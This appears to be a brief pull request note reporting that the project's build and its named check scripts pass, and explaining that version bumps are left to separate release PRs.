`npm run build` green, including `check:aahp` (7 gates), `check:feed` and `check:handoff`.

No version bump; releases go out as their own `chore(release):` PR in this repo.
